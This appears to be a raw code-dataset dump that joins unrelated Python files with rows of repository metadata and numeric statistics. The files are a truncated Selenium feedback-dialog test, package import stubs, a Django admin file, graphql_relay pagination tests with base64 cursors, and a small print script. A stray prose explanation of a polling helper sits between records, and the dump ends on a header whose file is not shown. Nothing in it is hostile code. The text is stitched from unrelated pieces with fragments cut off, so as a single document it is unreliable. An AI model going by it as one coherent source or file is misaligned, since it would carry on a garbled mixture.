# He tries again.
self.selenium.click('id=id_feedback_dialog_ok_button')
# The error message disappears immediately
self.wait_for_element_visibility('id=id_feedback_dialog_error', False, timeout_seconds=3)
# * The dialog goes away
self.wait_for_element_visibility('id=id_feedback_dialog', False)
# * He brings up the dialog again
self.selenium.click('link=Feedback')
self.wait_for_element_visibility('id=id_feedback_dialog', True)
# * He sees that the buttons are enabled and the error message is absent.
self.wait_for(
lambda: self.is_element_enabled('id_feedback_dialog_ok_button'),
lambda: 'ok button to become enabled'
)
self.wait_for(
lambda: self.is_element_enabled('id_feedback_dialog_cancel_button'),
lambda: 'cancel button to become enabled'
)
self.wait_for_element_visibility('id=id_feedback_dialog_error', False)
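The test above repeatedly polls UI state through `wait_for`, which takes a condition callable and a lazily evaluated description callable. A minimal sketch of such a polling helper (an assumption about the project's helper, not its actual implementation) could look like:

```python
import time

def wait_for(condition, describe, timeout_seconds=10, poll_interval=0.1):
    """Poll `condition` until it returns truthy or `timeout_seconds` elapses.

    `describe` is a zero-argument callable producing a human-readable
    description of what was being waited for; it is only evaluated when
    the wait times out, so building the message costs nothing on success.
    """
    deadline = time.time() + timeout_seconds
    while time.time() < deadline:
        if condition():
            return
        time.sleep(poll_interval)
    raise AssertionError("Timed out waiting for %s" % describe())
```

Passing the description as a lambda (as the tests do) keeps failure messages cheap to construct and always up to date with the state being checked.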
| 42.087591 | 109 | 0.656348 | 1,443 | 11,532 | 4.987526 | 0.155925 | 0.11477 | 0.124496 | 0.105044 | 0.822982 | 0.818952 | 0.814784 | 0.799361 | 0.799361 | 0.799361 | 0 | 0.002904 | 0.253469 | 11,532 | 273 | 110 | 42.241758 | 0.833082 | 0.181408 | 0 | 0.622754 | 0 | 0 | 0.348396 | 0.205585 | 0 | 0 | 0 | 0 | 0.173653 | 1 | 0.023952 | false | 0 | 0.005988 | 0 | 0.035928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
86961dd933a73f292da722fe76467657a20e950a | 242 | py | Python | colossalai/nn/layer/__init__.py | xdjiangkai/ColossalAI | 4a3d3446b04065fa1c89b78cba673e96115c6325 | [
"Apache-2.0"
] | null | null | null | colossalai/nn/layer/__init__.py | xdjiangkai/ColossalAI | 4a3d3446b04065fa1c89b78cba673e96115c6325 | [
"Apache-2.0"
] | null | null | null | colossalai/nn/layer/__init__.py | xdjiangkai/ColossalAI | 4a3d3446b04065fa1c89b78cba673e96115c6325 | [
"Apache-2.0"
] | 1 | 2022-01-06T17:16:32.000Z | 2022-01-06T17:16:32.000Z | from .colossalai_layer import *
from .parallel_1d import *
from .parallel_2d import *
from .parallel_2p5d import *
from .parallel_3d import *
from .parallel_sequence import *
from .utils import *
from .vanilla import *
from .wrapper import *
| 24.2 | 32 | 0.77686 | 33 | 242 | 5.515152 | 0.393939 | 0.43956 | 0.494505 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024272 | 0.14876 | 242 | 9 | 33 | 26.888889 | 0.859223 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
86d47f03820ceeb21682c096e8f60f4072f90a3d | 141 | py | Python | directed_information/__init__.py | elipugh/directed_information | d94172496a4d544c9e244c4a95acb8539017bb77 | [
"MIT"
] | 2 | 2019-04-23T23:08:03.000Z | 2021-01-24T08:26:12.000Z | directed_information/__init__.py | elipugh/directed_information | d94172496a4d544c9e244c4a95acb8539017bb77 | [
"MIT"
] | null | null | null | directed_information/__init__.py | elipugh/directed_information | d94172496a4d544c9e244c4a95acb8539017bb77 | [
"MIT"
] | null | null | null | from .compute_DI_MI import compute_DI_MI
from .ctwalgorithm import ctwalgorithm
from .ctwentropy import ctwentropy
from . import fast_mat_DI
| 28.2 | 40 | 0.858156 | 21 | 141 | 5.47619 | 0.428571 | 0.156522 | 0.191304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113475 | 141 | 4 | 41 | 35.25 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
86f6f3b21a38ff481034ad5a0661f51db03c6a26 | 208 | py | Python | test/mainApp/admin.py | BoggerSancho/test_mydjango | b7c456e408e7c76881524e8c68987c1cf3ac7ea9 | [
"BSD-3-Clause"
] | null | null | null | test/mainApp/admin.py | BoggerSancho/test_mydjango | b7c456e408e7c76881524e8c68987c1cf3ac7ea9 | [
"BSD-3-Clause"
] | 5 | 2020-06-05T19:40:11.000Z | 2021-06-10T21:06:08.000Z | test/mainApp/admin.py | BoggerSancho/test_mydjango | b7c456e408e7c76881524e8c68987c1cf3ac7ea9 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib import admin
from .models import Books, Transletors, Reader, Journal
admin.site.register(Books)
admin.site.register(Transletors)
admin.site.register(Reader)
admin.site.register(Journal)
| 23.111111 | 55 | 0.817308 | 28 | 208 | 6.071429 | 0.428571 | 0.211765 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081731 | 208 | 8 | 56 | 26 | 0.890052 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
810558dba8a50d544ab6b7e446194865f9de946e | 22,710 | py | Python | FastAPI Server Based/Tutorial/venv/Lib/site-packages/graphql_relay/connection/tests/test_arrayconnection.py | viswadeep-sarangi/DeployMLModel | 969a6425f2ac93188962f9c62a6b8cde94372212 | [
"MIT"
] | 2 | 2021-06-14T20:01:22.000Z | 2022-01-07T12:56:53.000Z | FastAPI Server Based/Tutorial/venv/Lib/site-packages/graphql_relay/connection/tests/test_arrayconnection.py | viswadeep-sarangi/DeployMLModel | 969a6425f2ac93188962f9c62a6b8cde94372212 | [
"MIT"
] | 13 | 2020-03-24T17:53:51.000Z | 2022-02-10T20:01:14.000Z | myvenv/lib/python3.6/site-packages/graphql_relay/connection/tests/test_arrayconnection.py | yog240597/saleor | b75a23827a4ec2ce91637f0afe6808c9d09da00a | [
"CC-BY-4.0"
] | 2 | 2021-04-12T18:16:00.000Z | 2021-06-26T05:01:18.000Z | from promise import Promise
from ..arrayconnection import (
connection_from_list,
connection_from_list_slice,
connection_from_promised_list,
connection_from_promised_list_slice,
cursor_for_object_in_connection
)
letters = ['A', 'B', 'C', 'D', 'E']
letters_promise = Promise.resolve(letters)
def test_returns_all_elements_without_filters():
c = connection_from_list(letters)
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
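The opaque cursors asserted above (e.g. 'YXJyYXljb25uZWN0aW9uOjA=') are base64 encodings of 'arrayconnection:<offset>'. A self-contained sketch of that encoding scheme (helper names are assumptions, not graphql_relay's API):

```python
import base64

PREFIX = "arrayconnection:"

def offset_to_cursor(offset):
    """Encode an integer list offset as an opaque base64 cursor."""
    payload = "%s%d" % (PREFIX, offset)
    return base64.b64encode(payload.encode("ascii")).decode("ascii")

def cursor_to_offset(cursor):
    """Decode a base64 cursor back to its integer offset."""
    decoded = base64.b64decode(cursor).decode("ascii")
    return int(decoded[len(PREFIX):])
```

Decoding the fixture cursors this way makes the expected edges readable: 'YXJyYXljb25uZWN0aW9uOjA=' is offset 0 ('A'), 'YXJyYXljb25uZWN0aW9uOjQ=' is offset 4 ('E').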
def test_respects_a_smaller_first():
c = connection_from_list(letters, dict(first=2))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_respects_an_overly_large_first():
c = connection_from_list(letters, dict(first=10))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_respects_a_smaller_last():
c = connection_from_list(letters, dict(last=2))
expected = {
'edges': [
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': True,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_respects_an_overly_large_last():
c = connection_from_list(letters, dict(last=10))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_pagination_respects_first_after():
c = connection_from_list(letters, dict(first=2, after='YXJyYXljb25uZWN0aW9uOjE='))
expected = {
'edges': [
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_pagination_respects_longfirst_after():
c = connection_from_list(
letters, dict(first=10, after='YXJyYXljb25uZWN0aW9uOjE='))
expected = {
'edges': [
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_pagination_respects_last_before():
c = connection_from_list(letters, dict(last=2, before='YXJyYXljb25uZWN0aW9uOjM='))
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': True,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_pagination_respects_longlast_before():
c = connection_from_list(
letters, dict(last=10, before='YXJyYXljb25uZWN0aW9uOjM='))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_first_after_before_few():
c = connection_from_list(letters, dict(
first=2, after='YXJyYXljb25uZWN0aW9uOjA=', before='YXJyYXljb25uZWN0aW9uOjQ=',
))
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_first_after_before_many():
c = connection_from_list(letters, dict(
first=4, after='YXJyYXljb25uZWN0aW9uOjA=', before='YXJyYXljb25uZWN0aW9uOjQ=',
))
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_first_after_before_exact():
c = connection_from_list(letters, dict(
first=3, after='YXJyYXljb25uZWN0aW9uOjA=', before='YXJyYXljb25uZWN0aW9uOjQ=',
))
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_last_after_before_few():
c = connection_from_list(letters, dict(
last=2, after='YXJyYXljb25uZWN0aW9uOjA=', before='YXJyYXljb25uZWN0aW9uOjQ=',
))
expected = {
'edges': [
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': True,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_last_after_before_many():
c = connection_from_list(letters, dict(
last=4, after='YXJyYXljb25uZWN0aW9uOjA=', before='YXJyYXljb25uZWN0aW9uOjQ=',
))
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_last_after_before_exact():
c = connection_from_list(letters, dict(
last=3, after='YXJyYXljb25uZWN0aW9uOjA=', before='YXJyYXljb25uZWN0aW9uOjQ=',
))
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_no_elements_first_0():
c = connection_from_list(letters, dict(first=0))
expected = {
'edges': [
],
'pageInfo': {
'startCursor': None,
'endCursor': None,
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_all_elements_invalid_cursors():
c = connection_from_list(letters, dict(before='invalid', after='invalid'))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_all_elements_cursor_outside():
c = connection_from_list(letters, dict(
before='YXJyYXljb25uZWN0aW9uOjYK', after='YXJyYXljb25uZWN0aW9uOi0xCg=='
))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_no_elements_cursors_cross():
c = connection_from_list(letters, dict(
before='YXJyYXljb25uZWN0aW9uOjI=', after='YXJyYXljb25uZWN0aW9uOjQ='
))
expected = {
'edges': [
],
'pageInfo': {
'startCursor': None,
'endCursor': None,
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_cursor_for_object_in_connection_member_object():
letter_b_cursor = cursor_for_object_in_connection(letters, 'B')
assert letter_b_cursor == 'YXJyYXljb25uZWN0aW9uOjE='
def test_cursor_for_object_in_connection_non_member_object():
letter_b_cursor = cursor_for_object_in_connection(letters, 'F')
assert letter_b_cursor is None
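The two tests above pin down `cursor_for_object_in_connection`'s contract: return the base64 offset cursor for a member, and None for a non-member. A minimal sketch of that behaviour (an illustration, not the library's code):

```python
import base64

def cursor_for_object_in_connection(data, obj):
    """Return the opaque cursor for `obj` in `data`, or None if absent."""
    if obj not in data:
        return None
    payload = "arrayconnection:%d" % data.index(obj)
    return base64.b64encode(payload.encode("ascii")).decode("ascii")
```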
def test_promised_list_returns_all_elements_without_filters():
c = connection_from_promised_list(letters_promise)
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.value.to_dict() == expected
def test_promised_list_respects_a_smaller_first():
c = connection_from_promised_list(letters_promise, dict(first=2))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.value.to_dict() == expected
def test_list_slice_works_with_a_just_right_array_slice():
c = connection_from_list_slice(
letters[1:3],
dict(
first=2,
after='YXJyYXljb25uZWN0aW9uOjA=',
),
slice_start=1,
list_length=5
)
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_list_slice_works_with_an_oversized_array_slice_left_side():
c = connection_from_list_slice(
letters[0:3],
dict(
first=2,
after='YXJyYXljb25uZWN0aW9uOjA=',
),
slice_start=0,
list_length=5
)
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_list_slice_works_with_an_oversized_array_slice_right_side():
c = connection_from_list_slice(
letters[2:4],
dict(
first=1,
after='YXJyYXljb25uZWN0aW9uOjE=',
),
slice_start=2,
list_length=5
)
expected = {
'edges': [
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_list_slice_works_with_an_oversized_array_slice_both_sides():
c = connection_from_list_slice(
letters[1:4],
dict(
first=1,
after='YXJyYXljb25uZWN0aW9uOjE=',
),
slice_start=1,
list_length=5
)
expected = {
'edges': [
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_list_slice_works_with_an_undersized_array_slice_left_side():
c = connection_from_list_slice(
letters[3:5],
dict(
first=3,
after='YXJyYXljb25uZWN0aW9uOjE=',
),
slice_start=3,
list_length=5
)
expected = {
'edges': [
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_list_slice_works_with_an_undersized_array_slice_right_side():
c = connection_from_list_slice(
letters[2:4],
dict(
first=3,
after='YXJyYXljb25uZWN0aW9uOjE=',
),
slice_start=2,
list_length=5
)
expected = {
'edges': [
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_list_slice_works_with_an_undersized_array_slice_both_sides():
c = connection_from_list_slice(
letters[3:4],
dict(
first=3,
after='YXJyYXljb25uZWN0aW9uOjE=',
),
slice_start=3,
list_length=5
)
expected = {
'edges': [
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_promised_list_slice_respects_a_smaller_first():
letters_promise_slice = Promise.resolve(letters[:3])
c = connection_from_promised_list_slice(
letters_promise_slice,
dict(first=2),
slice_start=0,
list_length=5
)
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.value.to_dict() == expected
| 27.100239 | 86 | 0.470145 | 1,444 | 22,710 | 7.161357 | 0.064404 | 0.044677 | 0.042066 | 0.04603 | 0.938304 | 0.922445 | 0.917319 | 0.881636 | 0.825549 | 0.790156 | 0 | 0.050658 | 0.401101 | 22,710 | 837 | 87 | 27.132616 | 0.709654 | 0 | 0 | 0.623545 | 0 | 0 | 0.278688 | 0.166094 | 0 | 0 | 0 | 0 | 0.040103 | 1 | 0.040103 | false | 0 | 0.002587 | 0 | 0.042691 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d4989265fbd96bd43ea5729332e6f5eabf460f6b | 178 | py | Python | pythonMundoTres/test.py | HendrylNogueira/CursoPython3 | c3d9d4e2a27312b83d744aaf0f8d01b26e6faf4f | [
"MIT"
] | null | null | null | pythonMundoTres/test.py | HendrylNogueira/CursoPython3 | c3d9d4e2a27312b83d744aaf0f8d01b26e6faf4f | [
"MIT"
] | null | null | null | pythonMundoTres/test.py | HendrylNogueira/CursoPython3 | c3d9d4e2a27312b83d744aaf0f8d01b26e6faf4f | [
"MIT"
] | null | null | null | print(f'{"cod nome":<18} {"gols":<10} {"total":>20}')
print(f'-' * 50)
print(f'{"0 "}', end='')
print(f'{"nome":<17}', end='')
print(f'{"3, 4":<10}', end='')
print(f'{"5":>20}')
| 25.428571 | 53 | 0.466292 | 31 | 178 | 2.677419 | 0.516129 | 0.433735 | 0.325301 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0.089888 | 178 | 6 | 54 | 29.666667 | 0.401235 | 0 | 0 | 0 | 0 | 0 | 0.466292 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
d49a86991f989be87ffd0222267e751018dbe977 | 8,037 | py | Python | tests/sync_tests/test_interfaces.py | simonw/httpcore | e3fc57660731f586cffab8a6f9fb0fdd69b7e344 | [
"BSD-3-Clause"
] | null | null | null | tests/sync_tests/test_interfaces.py | simonw/httpcore | e3fc57660731f586cffab8a6f9fb0fdd69b7e344 | [
"BSD-3-Clause"
